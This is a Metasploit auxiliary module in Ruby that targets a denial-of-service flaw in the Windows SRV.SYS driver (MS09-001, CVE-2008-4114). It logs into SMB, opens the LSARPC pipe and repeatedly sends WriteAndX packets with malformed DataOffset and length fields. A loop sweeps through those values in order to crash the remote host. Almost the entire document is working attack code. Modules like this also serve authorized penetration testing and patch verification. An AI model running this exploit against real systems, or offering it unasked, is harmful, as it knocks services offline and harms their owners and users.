class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset', 'Description' => %q{ This module exploits a denial of service vulnerability in the SRV.SYS driver of the Windows operating system. }, 'Author' => [ 'j.v.vallejo[at]gmail.com' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 6022 $', 'References' => [ ['MSB', 'MS09-001'], ['CVE', '2008-4114'], ['BID', '31179'], ])) end def send_smb_pkt(dlenlow, doffset,fillersize) connect() smb_login() pkt = CONST::SMB_CREATE_PKT.make_struct pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['WordCount'] = 24 pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['AndXOffset'] = 0xdede pkt['Payload'].v['FileNameLen'] = 14 pkt['Payload'].v['CreateFlags'] = 0x16 pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed pkt['Payload'].v['ShareAccess'] = 7 pkt['Payload'].v['CreateOptions'] = 0x400040 pkt['Payload'].v['Impersonation'] = 2 pkt['Payload'].v['Disposition'] = 1 pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" simple.client.smb_send(pkt.to_s) ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX) pkt = CONST::SMB_WRITE_PKT.make_struct data_offset = pkt.to_s.length - 4 filler = Rex::Text.rand_text(fillersize) pkt['Payload']['SMB'].v['Signature1']=0xcccccccc pkt['Payload']['SMB'].v['Signature2']=0xcccccccc pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt['Payload']['SMB'].v['WordCount'] = 14 pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['AndXOffset'] = 0xdede pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID'] pkt['Payload'].v['Offset'] = 0 pkt['Payload'].v['Reserved2'] = -1 pkt['Payload'].v['WriteMode'] = 8 pkt['Payload'].v['Remaining'] = fillersize pkt['Payload'].v['DataLenHigh'] = 0 pkt['Payload'].v['DataLenLow'] = dlenlow #<================== pkt['Payload'].v['DataOffset'] = doffset #<==== pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<==== pkt['Payload'].v['ByteCount'] = fillersize#<==== pkt['Payload'].v['Payload'] = filler simple.client.smb_send(pkt.to_s) end def run print_line("Attempting to crash the remote host...") k=72 j=0xffff while j>10000 i=0xffff while i>10000 begin print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}") send_smb_pkt(i,j,k) rescue print_line("rescue") end i=i-10000 end j=j-10000 end end end